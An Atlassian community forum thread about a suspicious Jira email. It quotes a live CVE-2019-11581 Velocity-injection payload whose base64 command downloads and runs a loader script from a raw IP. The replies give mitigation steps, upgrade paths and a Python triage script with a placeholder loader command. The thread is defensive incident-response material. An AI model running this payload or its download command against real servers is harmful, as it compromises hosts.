Got a weird email from our JIRA application

Michael March 26, 2021

Hi,

Can someone please help and advise why we got a weird email from our JIRA application? Our JIRA application version is v6.0.2#6097-sha1:e270beb. Below is the email message from our JIRA application.


[JIRA] #set ($cmd="bash -c {echo,c2ggLWMgIihjdXJsIC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSBodHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNofHx3Z2V0IC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSAtcSAtTyAtIGh0dHA6Ly8xOTQuMTQ1LjIyNy4yMS9sZHIuc2gpfHNoIg==}|{base64,-d}|{bash,-i}") #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $e.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) #set($scan=$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $scan.next() #end


Thanks,

Michael

4 answers

3 votes
Daniel Eads
Atlassian Team
April 1, 2021

Hi Michael,

I've looked through the command this string is attempting to execute, and believe the file it tries to download and run is a malware loader. I would advise taking these steps:

  1. Disable the "contact administrators" form in your Jira instance:
    1. Choose Administration > System.
    2. Choose General Configuration.
    3. Click Edit Settings.
    4. Scroll down to the Contact Administrators Form and set it to OFF.
    5. Click Update.
  2. Block the following URLs from being accessed by the internet, if you have a reverse proxy in front of your Jira instance:
    1. /secure/ContactAdministrators
    2. /secure/admin/SendBulkMail!default.jspa
    3. /admin/SendBulkMail!default.jspa
    4. /SendBulkMail!default.jspa
  3. Scan your server for malware
    1. The loader file in your question attempts to move the executable for iptables from /sbin/iptables to /sbin/iptables_ - I would consider the presence of that renamed executable to be proof that the loader script had run and that the server is likely compromised.
  4. Upgrade Jira to a recent version - any version released after July 10, 2019 should contain the fix for this CVE, as described in the security advisory for CVE-2019-11581. Since you are currently on Jira 6.0, you will need to make at least one intermediary upgrade to 7.0 before continuing up to a more recent version of Jira. I would suggest the following upgrade path:
    1. 6.0 (your current version) -> 6.4 -> 7.0 -> 7.6.17 (the last release in 7.6 - which contains the fix for the CVE)
    2. See Upgrading Jira applications for more upgrade information
  5. At this point, I would suggest either considering a Cloud migration - our cloud migration assistant app supports Jira 7.6 and newer - or continue upgrading to a more recent version of Jira Server such as Jira 8.13.
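The triage steps above (recognise the Velocity injection in the email, recover the download locations the encoded command points at so they can be blocked, enforce the reverse-proxy path blocklist, and check the host for the renamed iptables binary) can be scripted. The following is an added example, not code from Atlassian or from anyone in this thread; the sample email body is constructed by encoding a placeholder command that points at the reserved hostname loader.example.invalid, and the `root` parameter of `host_indicators` is an assumption so the check can be pointed at a mounted disk image instead of the live root.

```python
"""Defender-side triage for the CVE-2019-11581 style emails discussed in this thread."""
import base64
import os
import re
from urllib.parse import urlsplit

# Velocity #set directive followed (anywhere later) by the reflection chain the
# payload uses to reach java.lang.Runtime. Both together are a strong signal.
VELOCITY_INJECTION = re.compile(
    r'#set\s*\(\s*\$\w+\s*=.*?getClass\(\)\.forName\("java\.lang\.Runtime"\)',
    re.DOTALL,
)

# `{echo,<base64>}|{base64,-d}` smuggles a shell command through a brace-expanded
# argument list; capture the blob so it can be decoded and its URLs extracted.
ECHO_B64 = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}")

URL = re.compile(r"""(?:https?|ftp)://[^\s"'|)]+""")

# Endpoints the answer above recommends blocking at a reverse proxy.
BLOCKED_PATHS = (
    "/secure/ContactAdministrators",
    "/secure/admin/SendBulkMail!default.jspa",
    "/admin/SendBulkMail!default.jspa",
    "/SendBulkMail!default.jspa",
)


def decode_embedded_commands(text):
    """Return each {echo,...} base64 blob decoded to text; skip malformed blobs."""
    decoded = []
    for blob in ECHO_B64.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def triage_email(body):
    """Classify one email body and collect the network indicators to block."""
    decoded = decode_embedded_commands(body)
    urls = []
    for chunk in [body, *decoded]:
        urls.extend(URL.findall(chunk))
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    return {
        "velocity_injection": bool(VELOCITY_INJECTION.search(body)),
        "decoded_commands": decoded,
        "download_urls": sorted(set(urls)),
        "hosts_to_block": hosts,
    }


def is_blocked_path(request_target):
    """True if the request path (query string ignored) is one of BLOCKED_PATHS.

    The comparison is case-insensitive on purpose: as a blocklist it is safer
    to over-match than to let a capitalisation variant through.
    """
    path = urlsplit(request_target).path.rstrip("/").lower()
    return any(path == blocked.lower() for blocked in BLOCKED_PATHS)


def host_indicators(root="/"):
    """Check for the loader's iptables rename that the answer treats as proof of execution.

    `root` is an assumption of this example: pass the mount point of an offline
    image to inspect a compromised disk without booting it.
    """
    return {
        "iptables_renamed": os.path.exists(os.path.join(root, "sbin", "iptables_")),
        "iptables_missing": not os.path.exists(os.path.join(root, "sbin", "iptables")),
    }


# Constructed sample: a placeholder loader command encoded the same way the
# real email encodes its command, wrapped in the same Velocity directives.
SAMPLE_INNER = (
    'sh -c "(curl http://loader.example.invalid/ldr.sh'
    '||wget -q -O - http://loader.example.invalid/ldr.sh)|sh"'
)
SAMPLE_BODY = (
    '[JIRA] #set ($cmd="bash -c {echo,'
    + base64.b64encode(SAMPLE_INNER.encode()).decode()
    + '}|{base64,-d}|{bash,-i}") #set ($e="exp") '
    '#set ($a=$e.getClass().forName("java.lang.Runtime")'
    '.getMethod("getRuntime",null).invoke(null,null).exec($cmd))'
)

if __name__ == "__main__":
    for key, value in triage_email(SAMPLE_BODY).items():
        print(f"{key}: {value}")
    print("host:", host_indicators())
```

Run it on the live host to print the triage of the constructed sample plus the iptables check; to triage a real message, read the saved email body from a file and pass it to `triage_email`, then feed `hosts_to_block` to your egress filtering and use `is_blocked_path` (or the equivalent rule in your proxy) on access logs to see whether the blocked endpoints were hit before the block was in place.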
0 votes
Michael May 10, 2021

Can anyone help with my issue?

0 votes
Bastien Lespinasse April 1, 2021

Hello Michael,


We received the exact same emails not long ago. We decided to open a ticket on Atlassian support. We believe it is related to https://confluence.atlassian.com/adminjiraserver/jira-security-advisory-2019-07-10-1047539912.html and https://community.atlassian.com/t5/Jira-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241 but we are not sure.


Best regards,

Bastien.

Ramith Dilshan
April 20, 2021

Hi Bastien

Could you get a solution for this weird mail?

Bastien Lespinasse May 19, 2021

Hello Ramith,


Atlassian confirmed that if your Jira has been upgraded to a fixed version, this is not a problem.

List of fixed versions:

  • 7.6.14
  • 7.13.5
  • 8.0.3
  • 8.1.2
  • 8.2.3
  • All versions higher than 8.3

Therefore, we were protected but we were definitely under attack.

0 votes
Michael March 31, 2021

Hi, can anyone help me with this issue?
